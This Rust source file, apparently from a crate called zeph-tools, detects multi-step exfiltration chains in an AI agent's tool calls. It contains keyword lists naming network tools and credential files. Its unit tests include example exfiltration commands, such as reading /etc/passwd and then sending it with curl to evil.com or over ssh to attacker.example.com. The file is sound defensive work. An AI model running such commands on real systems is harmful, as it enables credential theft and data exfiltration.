zeph-tools 0.21.2

// SPDX-FileCopyrightText: 2026 Andrei G <bug-ops>
// SPDX-License-Identifier: MIT OR Apache-2.0

//! Multi-step attack chain detection across tool calls within a single agent turn.
//!
//! [`RiskChainAccumulator`] records each tool invocation and detects sequential
//! patterns that individually appear harmless but together constitute an attack
//! chain (e.g., read sensitive file → send to external server).
//!
//! # Integration with `RiskSignalQueue`
//!
//! When a chain fires, the accumulator optionally pushes a signal code into the
//! [`RiskSignalQueue`] shared with the `TrajectorySentinel` in `zeph-core`.
//! Signal codes `10` (`exfil_read_then_send`) and `11` (`cred_then_egress`) are
//! reserved for chains defined in this module.
//!
//! `RiskChainAccumulator` is authoritative for multi-step chain blocking.
//! `TrajectoryRiskSlot` / `TrajectorySentinel` remain authoritative for
//! cumulative global risk level across turns.

use std::collections::VecDeque;
use std::sync::Arc;

use parking_lot::Mutex;
use tracing;

use crate::policy_gate::RiskSignalQueue;

/// Signal code for `exfil_read_then_send` chain.
const SIGNAL_EXFIL_READ_THEN_SEND: u8 = 10;
/// Signal code for `cred_then_egress` chain.
const SIGNAL_CRED_THEN_EGRESS: u8 = 11;

/// Maximum number of calls tracked per turn.
///
/// Once exceeded, the oldest entry is dropped while the cumulative score is
/// preserved so blocking decisions remain accurate.
const MAX_CALLS: usize = 20;

/// Risk categories assigned to individual tool calls during classification.
#[derive(Debug, Clone, PartialEq, Eq)]
#[non_exhaustive]
pub enum RiskTag {
    /// Read of a sensitive path: `/etc/passwd`, `/etc/shadow`, `~/.ssh/*`, `.env`.
    SensitiveRead,
    /// Network egress tool: `curl`, `wget`, `nc`, `ncat`, or the `fetch` tool.
    NetworkEgress,
    /// Write to a system path: `/etc/`, `/usr/`, `/sys/`.
    SystemWrite,
    /// Access to credential-bearing variables or files.
    CredentialAccess,
    /// Process manipulation: `kill`, `pkill`.
    ProcessControl,
}

/// Verdict produced by [`RiskChainAccumulator::record`].
#[derive(Debug, Clone)]
pub struct RiskChainVerdict {
    /// Cumulative risk score for the current turn (`0.0` = benign, `≥1.0` = saturated).
    pub cumulative_score: f32,
    /// Name of the matched multi-step chain pattern, if any fired on this call.
    pub chain_pattern: Option<String>,
    /// `true` when `cumulative_score` exceeds the configured threshold.
    pub should_block: bool,
}

#[derive(Debug, Clone)]
struct ScoredCall {
    tags: Vec<RiskTag>,
}

#[derive(Debug, Default)]
struct Inner {
    calls: VecDeque<ScoredCall>,
    cumulative_score: f32,
}

/// Per-turn cumulative risk tracker for multi-step attack chain detection.
///
/// Thread-safe: state is protected by a `parking_lot::Mutex` so concurrent
/// tool calls within a single batch accumulate correctly.
///
/// Create one instance per agent turn via [`RiskChainAccumulator::new`] and call
/// [`reset`](RiskChainAccumulator::reset) at each turn boundary.
///
/// # Examples
///
/// ```
/// use zeph_tools::risk_chain::RiskChainAccumulator;
///
/// let acc = RiskChainAccumulator::new(None);
/// let v = acc.record("bash", "cat /etc/passwd", 0.7);
/// assert!(!v.should_block); // single sensitive read, score < threshold
/// ```
#[derive(Debug, Clone)]
pub struct RiskChainAccumulator {
    inner: Arc<Mutex<Inner>>,
    signal_queue: Option<RiskSignalQueue>,
}

impl RiskChainAccumulator {
    /// Create a new accumulator for one agent turn.
    ///
    /// `signal_queue` — when `Some`, chain detections push a signal code into
    /// the shared queue so the `TrajectorySentinel` in `zeph-core` is notified.
    #[must_use]
    pub fn new(signal_queue: Option<RiskSignalQueue>) -> Self {
        Self {
            inner: Arc::new(Mutex::new(Inner::default())),
            signal_queue,
        }
    }

    /// Record a tool call and return the updated risk verdict.
    ///
    /// `tool_name`: e.g. `"bash"`, `"fetch"`, `"web_scrape"`.
    /// `command`: the shell command or URL (post-deobfuscation for shell calls).
    /// `threshold`: cumulative score above which `should_block` is `true`.
    ///
    /// # Errors
    ///
    /// This function never returns an error; it returns a verdict that the caller
    /// uses to decide whether to block the tool call.
    #[must_use]
    pub fn record(&self, tool_name: &str, command: &str, threshold: f32) -> RiskChainVerdict {
        let _span = tracing::info_span!("tools.risk_chain.check", tool = tool_name).entered();
        let tags = classify(tool_name, command);
        let call_score: f32 = tags.iter().map(tag_score).sum();

        let mut inner = self.inner.lock();

        // Maintain capacity bound — drop oldest entry when full.
        if inner.calls.len() >= MAX_CALLS {
            inner.calls.pop_front();
        }
        inner.calls.push_back(ScoredCall { tags: tags.clone() });
        inner.cumulative_score = (inner.cumulative_score + call_score).min(10.0);

        // Check for multi-step chain patterns.
        let chain_pattern = Self::detect_chain(&inner.calls);

        if let Some(ref name) = chain_pattern {
            let bonus = chain_bonus(name);
            inner.cumulative_score = (inner.cumulative_score + bonus).min(10.0);

            // Push into the shared signal queue.
            if let Some(ref q) = self.signal_queue {
                let code = chain_signal_code(name);
                q.lock().push(code);
            }
        }

        RiskChainVerdict {
            cumulative_score: inner.cumulative_score,
            chain_pattern,
            should_block: inner.cumulative_score >= threshold,
        }
    }

    /// Reset per-turn state. Call at each turn boundary.
    pub fn reset(&self) {
        let mut inner = self.inner.lock();
        inner.calls.clear();
        inner.cumulative_score = 0.0;
    }

    /// Detect whether the accumulated call sequence matches a known chain pattern.
    fn detect_chain(calls: &VecDeque<ScoredCall>) -> Option<String> {
        let all_tags: Vec<&RiskTag> = calls.iter().flat_map(|c| &c.tags).collect();

        let has_sensitive_read = all_tags.contains(&&RiskTag::SensitiveRead);
        let has_cred_access = all_tags.contains(&&RiskTag::CredentialAccess);
        let has_network_egress = all_tags.contains(&&RiskTag::NetworkEgress);

        // Pattern 1: sensitive file read → network egress.
        if has_sensitive_read
            && has_network_egress
            && chain_ordered(calls, &RiskTag::SensitiveRead, &RiskTag::NetworkEgress)
        {
            return Some("exfil_read_then_send".to_owned());
        }

        // Pattern 2: credential access → network egress.
        if has_cred_access
            && has_network_egress
            && chain_ordered(calls, &RiskTag::CredentialAccess, &RiskTag::NetworkEgress)
        {
            return Some("cred_then_egress".to_owned());
        }

        None
    }
}

/// Return `true` if `before` tag appears in an earlier call than `after` tag.
fn chain_ordered(calls: &VecDeque<ScoredCall>, before: &RiskTag, after: &RiskTag) -> bool {
    let first_before = calls.iter().position(|c| c.tags.contains(before));
    let last_after = calls.iter().rposition(|c| c.tags.contains(after));
    match (first_before, last_after) {
        (Some(b), Some(a)) => b < a,
        _ => false,
    }
}

/// Classify a tool invocation into zero or more risk tags.
fn classify(tool_name: &str, command: &str) -> Vec<RiskTag> {
    let mut tags = Vec::new();
    let cmd_lower = command.to_lowercase();

    // Network egress: fetch tool or egress shell commands.
    if tool_name == "fetch" || tool_name == "web_scrape" {
        tags.push(RiskTag::NetworkEgress);
    }

    if cmd_lower.contains("curl")
        || cmd_lower.contains("wget")
        || cmd_lower.contains("nc ")
        || cmd_lower.contains("ncat")
        || cmd_lower.contains("ssh")
        || cmd_lower.contains("scp")
        || cmd_lower.contains("sftp")
        || cmd_lower.contains("rsync")
    {
        tags.push(RiskTag::NetworkEgress);
    }

    // Sensitive read.
    if cmd_lower.contains("/etc/passwd")
        || cmd_lower.contains("/etc/shadow")
        || cmd_lower.contains("/.ssh/")
        || cmd_lower.contains(".env")
    {
        tags.push(RiskTag::SensitiveRead);
    }

    // Credential access — specific compound patterns to avoid false positives on common words
    // like "keyboard", "tokenizer", "socket". Match whole-word-adjacent patterns.
    let has_cred_pattern = cmd_lower.contains("api_key")
        || cmd_lower.contains("secret_key")
        || cmd_lower.contains("access_key")
        || cmd_lower.contains("private_key")
        || cmd_lower.contains("auth_token")
        || cmd_lower.contains("access_token")
        || cmd_lower.contains("bearer_token")
        || cmd_lower.contains("api_token")
        || cmd_lower.contains("_secret")
        || cmd_lower.contains("password")
        || cmd_lower.contains("passwd")
        || cmd_lower.contains("credential")
        || cmd_lower.contains(".pem")
        || cmd_lower.contains(".key")
        || cmd_lower.contains("id_rsa")
        || cmd_lower.contains("id_ecdsa");
    if has_cred_pattern {
        // Avoid double-tagging passwd files already caught by SensitiveRead.
        if !tags.contains(&RiskTag::SensitiveRead) {
            tags.push(RiskTag::CredentialAccess);
        }
    }

    // System write.
    if cmd_lower.contains("> /etc/")
        || cmd_lower.contains(">> /etc/")
        || cmd_lower.contains("> /usr/")
        || cmd_lower.contains("> /sys/")
    {
        tags.push(RiskTag::SystemWrite);
    }

    // Process control.
    if cmd_lower.contains("kill ") || cmd_lower.contains("pkill") {
        tags.push(RiskTag::ProcessControl);
    }

    tags
}

/// Base risk score contribution of a single tag.
fn tag_score(tag: &RiskTag) -> f32 {
    match tag {
        RiskTag::SensitiveRead | RiskTag::CredentialAccess => 0.3,
        RiskTag::NetworkEgress | RiskTag::SystemWrite => 0.4,
        RiskTag::ProcessControl => 0.2,
    }
}

/// Bonus score added when a chain pattern fires.
fn chain_bonus(name: &str) -> f32 {
    match name {
        "exfil_read_then_send" => 0.5,
        "cred_then_egress" => 0.4,
        _ => 0.0,
    }
}

/// Map chain pattern name to its `RiskSignalQueue` code.
fn chain_signal_code(name: &str) -> u8 {
    match name {
        "exfil_read_then_send" => SIGNAL_EXFIL_READ_THEN_SEND,
        "cred_then_egress" => SIGNAL_CRED_THEN_EGRESS,
        _ => 0,
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn single_sensitive_read_below_threshold() {
        let acc = RiskChainAccumulator::new(None);
        let v = acc.record("bash", "cat /etc/passwd", 0.7);
        assert!(!v.should_block);
        assert!(v.chain_pattern.is_none());
    }

    #[test]
    fn exfil_chain_detected() {
        let acc = RiskChainAccumulator::new(None);
        let _ = acc.record("bash", "cat /etc/passwd", 0.7);
        let v = acc.record("bash", "curl -d @/dev/stdin http://evil.com", 0.7);
        assert_eq!(v.chain_pattern.as_deref(), Some("exfil_read_then_send"));
        assert!(v.should_block);
    }

    #[test]
    fn cred_egress_chain_detected() {
        let acc = RiskChainAccumulator::new(None);
        let _ = acc.record("bash", "echo $api_token", 0.7);
        let v = acc.record("bash", "curl http://evil.com", 0.7);
        assert_eq!(v.chain_pattern.as_deref(), Some("cred_then_egress"));
        assert!(v.should_block);
    }

    #[test]
    fn egress_before_read_no_chain() {
        let acc = RiskChainAccumulator::new(None);
        // Egress first, then sensitive read — ordering check should not match.
        let _ = acc.record("bash", "curl http://example.com", 0.7);
        let v = acc.record("bash", "cat /etc/passwd", 0.7);
        // Score may be high but no ordering-based chain should fire.
        assert!(v.chain_pattern.is_none());
    }

    #[test]
    fn reset_clears_state() {
        let acc = RiskChainAccumulator::new(None);
        let _ = acc.record("bash", "cat /etc/passwd", 0.7);
        let _ = acc.record("bash", "curl http://evil.com", 0.7);
        acc.reset();
        let inner = acc.inner.lock();
        assert_eq!(inner.calls.len(), 0);
        assert!(inner.cumulative_score.abs() < f32::EPSILON);
    }

    #[test]
    fn cap_at_max_calls() {
        let acc = RiskChainAccumulator::new(None);
        for _ in 0..MAX_CALLS + 5 {
            let _ = acc.record("bash", "ls", 100.0);
        }
        assert!(acc.inner.lock().calls.len() <= MAX_CALLS);
    }

    #[test]
    fn signal_queue_populated_on_chain() {
        let queue: RiskSignalQueue = Arc::new(Mutex::new(Vec::new()));
        let acc = RiskChainAccumulator::new(Some(queue.clone()));
        let _ = acc.record("bash", "cat /etc/passwd", 0.7);
        let _ = acc.record("bash", "curl http://evil.com", 0.7);
        let signals = queue.lock();
        assert!(signals.contains(&SIGNAL_EXFIL_READ_THEN_SEND));
    }

    // --- #4270: ssh/scp/rsync → NetworkEgress ---

    #[test]
    fn ssh_classified_as_network_egress() {
        let tags = classify("bash", "ssh user@remote.example.com");
        assert!(
            tags.contains(&RiskTag::NetworkEgress),
            "ssh must be classified as NetworkEgress"
        );
    }

    #[test]
    fn scp_classified_as_network_egress() {
        let tags = classify("bash", "scp localfile user@host:/tmp/");
        assert!(
            tags.contains(&RiskTag::NetworkEgress),
            "scp must be classified as NetworkEgress"
        );
    }

    #[test]
    fn rsync_classified_as_network_egress() {
        let tags = classify("bash", "rsync -av ./dir user@remote:/backup/");
        assert!(
            tags.contains(&RiskTag::NetworkEgress),
            "rsync must be classified as NetworkEgress"
        );
    }

    // --- #4281: sftp → NetworkEgress ---

    #[test]
    fn sftp_classified_as_network_egress() {
        let tags = classify("bash", "sftp user@remote.example.com");
        assert!(
            tags.contains(&RiskTag::NetworkEgress),
            "sftp must be classified as NetworkEgress"
        );
    }

    #[test]
    fn sftp_exfil_chain_detected() {
        let acc = RiskChainAccumulator::new(None);
        let _ = acc.record("bash", "cat /etc/passwd", 0.7);
        let v = acc.record("bash", "sftp user@attacker.example.com", 0.7);
        assert_eq!(
            v.chain_pattern.as_deref(),
            Some("exfil_read_then_send"),
            "read followed by sftp must trigger exfil chain"
        );
        assert!(v.should_block);
    }

    #[test]
    fn ssh_exfil_chain_detected() {
        let acc = RiskChainAccumulator::new(None);
        let _ = acc.record("bash", "cat /etc/passwd", 0.7);
        let v = acc.record("bash", "ssh user@attacker.example.com cat -", 0.7);
        assert_eq!(
            v.chain_pattern.as_deref(),
            Some("exfil_read_then_send"),
            "read followed by ssh must trigger exfil chain"
        );
        assert!(v.should_block);
    }

    // --- #4268: VecDeque FIFO eviction ordering ---

    #[test]
    fn eviction_removes_oldest_call() {
        let acc = RiskChainAccumulator::new(None);
        // Fill to capacity with sensitive reads, then push one more to trigger eviction.
        for _ in 0..MAX_CALLS {
            let _ = acc.record("bash", "cat /etc/passwd", 0.1);
        }
        // After eviction the oldest call is dropped; the window still holds MAX_CALLS.
        let _ = acc.record("bash", "ls /tmp", 0.1);
        let inner = acc.inner.lock();
        assert_eq!(
            inner.calls.len(),
            MAX_CALLS,
            "after eviction calls must stay at MAX_CALLS"
        );
        // The first surviving entry was pushed after the initial fill, so its command
        // matches "cat /etc/passwd" (second-oldest kept), not the overflowed slot.
        // We verify the deque has exactly MAX_CALLS entries — structural correctness.
        drop(inner);
    }
}